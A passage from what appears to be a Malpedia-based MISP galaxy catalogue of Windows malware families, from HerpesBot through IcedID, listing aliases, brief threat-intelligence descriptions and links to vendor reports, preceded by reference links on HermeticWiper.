https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/

https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/

https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/

https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/

https://www.youtube.com/watch?v=sUlW45c9izU

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations

https://www.brighttalk.com/webcast/15591/534324

https://eln0ty.github.io/malware%20analysis/HermeticWiper/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://dgc.org/en/hermeticwiper-malware/

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html

https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war

https://www.englert.one/hermetic-wiper-reverse-code-engineering

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/

https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/

https://thehackernews.com/2022/02/putin-warns-russian-critical.html

https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://community.riskiq.com/article/9f59cb85

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/

https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine

https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://brandefense.io/hermeticwiper-technical-analysis-report/

https://twitter.com/threatintel/status/1496578746014437376

https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/

HerpesBot

The tag is: misp-galaxy:malpedia="HerpesBot"

HerpesBot is also known as:

Table 3671. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes

HesperBot

The tag is: misp-galaxy:malpedia="HesperBot"

HesperBot is also known as:

Table 3672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot

HiAsm

The tag is: misp-galaxy:malpedia="HiAsm"

HiAsm is also known as:

Table 3674. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hiasm

https://fortiguard.fortinet.com/encyclopedia/virus/6488677

HIGHNOON

According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.

The tag is: misp-galaxy:malpedia="HIGHNOON"

HIGHNOON is also known as:

Table 3678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

https://twitter.com/MrDanPerez/status/1159461995013378048

https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOON.BIN

The tag is: misp-galaxy:malpedia="HIGHNOON.BIN"

HIGHNOON.BIN is also known as:

Table 3679. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin

https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOTE

The tag is: misp-galaxy:malpedia="HIGHNOTE"

HIGHNOTE is also known as:

  • ChyNode

Table 3680. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote

https://twitter.com/bkMSFT/status/1153994428949749761

Himera Loader

The tag is: misp-galaxy:malpedia="Himera Loader"

Himera Loader is also known as:

Table 3685. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader

https://twitter.com/James_inthe_box/status/1260191589789392898

Hive (Windows)

Hive is a strain of ransomware that was first discovered in June 2021. Hive was designed to be used by Ransomware-as-a-service providers, to enable novice cyber-criminals to launch ransomware attacks on healthcare providers, energy providers, charities, and retailers across the globe. In 2022 there was a switch from GoLang to Rust.

The tag is: misp-galaxy:malpedia="Hive (Windows)"

Hive (Windows) is also known as:

Table 3687. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hive

https://resources.prodaft.com/wazawaka-report

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.connectwise.com/resources/hive-profile

https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/

https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/

https://www.varonis.com/blog/hive-ransomware-analysis

https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html

https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/

https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html

https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://arxiv.org/pdf/2202.08477.pdf

https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf

https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/

https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://github.com/reecdeep/HiveV5_file_decryptor

https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/

https://github.com/rivitna/Malware/tree/main/Hive

https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html

https://blog.group-ib.com/hive

https://www.ic3.gov/Media/News/2021/210825.pdf

Hi-Zor RAT

The tag is: misp-galaxy:malpedia="Hi-Zor RAT"

Hi-Zor RAT is also known as:

Table 3688. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat

https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

HLUX

The tag is: misp-galaxy:malpedia="HLUX"

HLUX is also known as:

Table 3689. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux

Holcus Installer (Adware)

Adware, tied to eGobbler and Nephos7 campaigns,

The tag is: misp-galaxy:malpedia="Holcus Installer (Adware)"

Holcus Installer (Adware) is also known as:

Table 3690. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus

https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0

HOLERUN

The tag is: misp-galaxy:malpedia="HOLERUN"

HOLERUN is also known as:

Table 3691. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

homefry

a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.

The tag is: misp-galaxy:malpedia="homefry"

homefry is also known as:

Table 3692. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Hopscotch

Hopscotch is part of the Regin framework.

The tag is: misp-galaxy:malpedia="Hopscotch"

Hopscotch is also known as:

Table 3695. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch

https://www.youtube.com/watch?v=VnzP00DZlx4

HorusEyes RAT

Remote Acess Tool Written in VB.NET.

The tag is: misp-galaxy:malpedia="HorusEyes RAT"

HorusEyes RAT is also known as:

Table 3696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes

https://github.com/arsium/HorusEyesRat_Public

Horus Eyes RAT

Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine.

The tag is: misp-galaxy:malpedia="Horus Eyes RAT"

Horus Eyes RAT is also known as:

Table 3697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.horus_eyes_rat

https://seguranca-informatica.pt/the-clandestine-horus-eyes-rat-from-the-underground-to-criminals-arsenal/

HOTWAX

HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.

The tag is: misp-galaxy:malpedia="HOTWAX"

HOTWAX is also known as:

Table 3699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

https://securelist.com/lazarus-under-the-hood/77908/

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html

https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/

https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf

https://content.fireeye.com/apt/rpt-apt38

Houdini

Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.

The tag is: misp-galaxy:malpedia="Houdini"

Houdini is also known as:

  • Hworm

  • Jenxcus

  • Kognito

  • Njw0rm

  • WSHRAT

  • dinihou

  • dunihi

Table 3700. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md

https://www.youtube.com/watch?v=h3KLKCdMUUY

https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/

https://blogs.360.cn/post/APT-C-44.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://cofense.com/houdini-worm-transformed-new-phishing-attack/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.youtube.com/watch?v=XDAiS6KBDOs

https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

http://blogs.360.cn/post/analysis-of-apt-c-37.html

https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/

https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated

http://blog.morphisec.com/hworm-houdini-aka-njrat

https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

HtBot

The tag is: misp-galaxy:malpedia="HtBot"

HtBot is also known as:

Table 3701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot

htpRAT

The tag is: misp-galaxy:malpedia="htpRAT"

htpRAT is also known as:

Table 3702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat

https://www.riskiq.com/blog/labs/htprat/

HTTPSnoop

Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.

The tag is: misp-galaxy:malpedia="HTTPSnoop"

HTTPSnoop is also known as:

Table 3706. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsnoop

https://blog.talosintelligence.com/introducing-shrouded-snooper/

HTTP(S) uploader

The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.

It accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port

The tag is: misp-galaxy:malpedia="HTTP(S) uploader"

HTTP(S) uploader is also known as:

Table 3707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://securelist.com/lazarus-threatneedle/100803/

Hunter Stealer

The tag is: misp-galaxy:malpedia="Hunter Stealer"

Hunter Stealer is also known as:

Table 3710. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter

https://twitter.com/3xp0rtblog/status/1324800226381758471

HuskLoader

The tag is: misp-galaxy:malpedia="HuskLoader"

HuskLoader is also known as:

Table 3712. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader

https://twitter.com/SethKingHi/status/1612377098777133057

Hussar

The tag is: misp-galaxy:malpedia="Hussar"

Hussar is also known as:

Table 3713. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

HxDef

The tag is: misp-galaxy:malpedia="HxDef"

HxDef is also known as:

  • HacDef

  • HackDef

  • HackerDefender

Table 3714. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef

https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/

HyperBro

HyperBro is a RAT that has been observed to target primarily within the gambling industries, though it has been spotted in other places as well. The malware typically consists of 3 or more components: a) a genuine loader typically with a signed certification b) a malicious DLL loader loaded from the former component via DLL hijacking c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within.

The tag is: misp-galaxy:malpedia="HyperBro"

HyperBro is also known as:

Table 3715. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro

https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/

https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/

https://www.intrinsec.com/apt27-analysis/

https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt

https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?blob=publicationFile&v=10

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.secureworks.com/research/threat-profiles/bronze-union

https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

HYPERSCRAPE

The tag is: misp-galaxy:malpedia="HYPERSCRAPE"

HYPERSCRAPE is also known as:

Table 3716. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperscrape

https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/

HyperSSL (Windows)

Sideloader used by EmissaryPanda

The tag is: misp-galaxy:malpedia="HyperSSL (Windows)"

HyperSSL (Windows) is also known as:

  • FOCUSFJORD

  • Soldier

  • Sysupdate

Table 3717. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://norfolkinfosec.com/emissary-panda-dll-backdoor/

https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf

https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf

https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://twitter.com/ESETresearch/status/1594937054303236096

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

HZ RAT

The tag is: misp-galaxy:malpedia="HZ RAT"

HZ RAT is also known as:

Table 3718. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat

https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2

Icarus

Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.

The tag is: misp-galaxy:malpedia="Icarus"

Icarus is also known as:

Table 3719. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icarus

https://twitter.com/struppigel/status/1566685309093511170

IcedID

According to Proofpoint, IcedID (aka BokBot) is a malware originally classified as a banking malware and was first observed in 2017. It also acts as a loader for other malware, including ransomware. The well-known IcedID version consists of an initial loader which contacts a Loader C2 server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot. IcedID is developed and operated by the actor named LUNAR SPIDER.

As previously published, historically there has been just one version of IcedID that has remained constant since 2017. * In November 2022, Proofpoint researchers observed the first new variant of IcedID Proofpoint dubbed 'IcedID Lite' distributed as a follow-on payload in a TA542 Emotet campaign. It was dropped by the Emotet malware soon after the actor returned to the e-crime landscape after a nearly four-month break. * The IcedID Lite Loader observed in November 2022 contains a static URL to download a 'Bot Pack' file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud. * Starting in February 2023, Proofpoint observed the new Forked variant of IcedID. This variant was distributed by TA581 and one unattributed threat activity cluster which acted as initial access facilitators. The campaigns used a variety of email attachments such as Microsoft OneNote attachments and somewhat rare to see .URL attachments, which led to the Forked variant of IcedID.

The tag is: misp-galaxy:malpedia="IcedID"

IcedID is also known as:

  • BokBot

  • IceID

Table 3720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol

https://www.youtube.com/watch?v=oZ4bwnjcXWg

https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/

https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/

https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id

https://twitter.com/embee_research/status/1592067841154756610?s=20

https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/

https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/

https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/

https://isc.sans.edu/diary/28636

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.binarydefense.com/icedid-gziploader-analysis/

https://www.silentpush.com/blog/icedid-command-and-control-infrastructure

https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing

https://ceriumnetworks.com/threat-of-the-month-icedid-malware/

https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/

https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

https://blog.minerva-labs.com/icedid-maas

https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/

https://blog.group-ib.com/prometheus-tds

https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/

https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html

https://github.com/0xThiebaut/PCAPeek/

https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html

